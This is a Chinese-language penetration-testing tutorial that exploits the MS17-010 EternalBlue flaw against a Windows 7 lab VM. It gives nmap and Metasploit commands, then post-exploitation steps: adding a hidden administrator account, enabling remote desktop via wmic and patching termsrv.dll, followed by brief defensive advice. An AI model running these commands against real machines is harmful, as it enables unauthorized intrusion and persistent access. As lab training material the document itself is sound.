109win7u盘 ()

视频加载中...

win77利用永恒蓝漏洞渗透测试完整视频漏洞介绍(Microsoft 安全公告 MS17-010 - 严重等级)

https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010

此安全更新程序已修复。 Microsoft Windows 多个漏洞。若攻击者向 Windows SMBv1 如果服务器发送特殊设计信息,最严重的漏洞可能允许远程执行代码。

测试环境
KALI LINUX 2020 靶机VirtualBox(WIN7 旗舰版)
靶机地址:192.168.88.109
工具:nmap,metasploit v5.0.73-dev,rdesktop,universal termsrv.dll path

1.扫描主机的开放端口和服务 nmap –sS –sV –Pn 192.168.88.109
#Nmap 参数解释
#-sS 使用SYN半开式扫描,使扫描结果更加准确(也称为半开放,或隐身扫描)
#-sV 版本检测,-检测打开的端口以获取服务和版本信息
#Pn 不判断目标主机的存活性,直接扫描

2.扫描是否有永恒的蓝色漏洞
#search ms17_010
#use auxiliary/scanner/smb/smb_ms17_010 或者 序号
#set rhosts 192.168.88.109
#run

3.利用smb_ms17_010漏洞获得系统管理权限
#search ms_010
#use exploit/windows/smb/ms17_010_eternalblue 或者 序号
#set rhosts 192.168.88.109
#options 检查配置是否正常
#run
下面的界面是成功的


提示----win----,出现c:\\windows\\system32即为成功



4.创建管理员账号,打开3389远程桌面服务
# 创建用户名root,密码为12345的账户 net user root 12345 /add
#将root账户加入到administrators管理员组 net localgroup administrators root /add
#开启3389服务 wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
#连接远程桌面 rdesktop -g 1440x900 -P -z -x l -r sound:off 192.168.88.109


5.WIN多用户连接远程桌面
(1)修改组策略
计算机配置-管理模板-【Windows组件:【远程桌面服务】-【远程桌面会话主机】-【连接】-【标准】双击【限制连接数量】将限制链接数修改为2个以上。
计算机配置-管理模板-【Windows组件-【远程桌面服务】-【远程桌面会话主机】-【连接】-【标准】双击【将远程桌面服务用户限制到单独的远程桌面服务会话】,禁止该策略。
(2)安装远程桌面多用户连接限制补丁
#下载universal termsrv.dll path补丁,分为X86,X64两个版本,根据系统安装相应版本.


6.防范措施
(1)打开自带防火墙的系统,关闭135、137、138、139,445端口
(2)安装相应的补丁

http://www.catalog.update.microsoft.com/search.aspx?q=KB4012212


电脑知识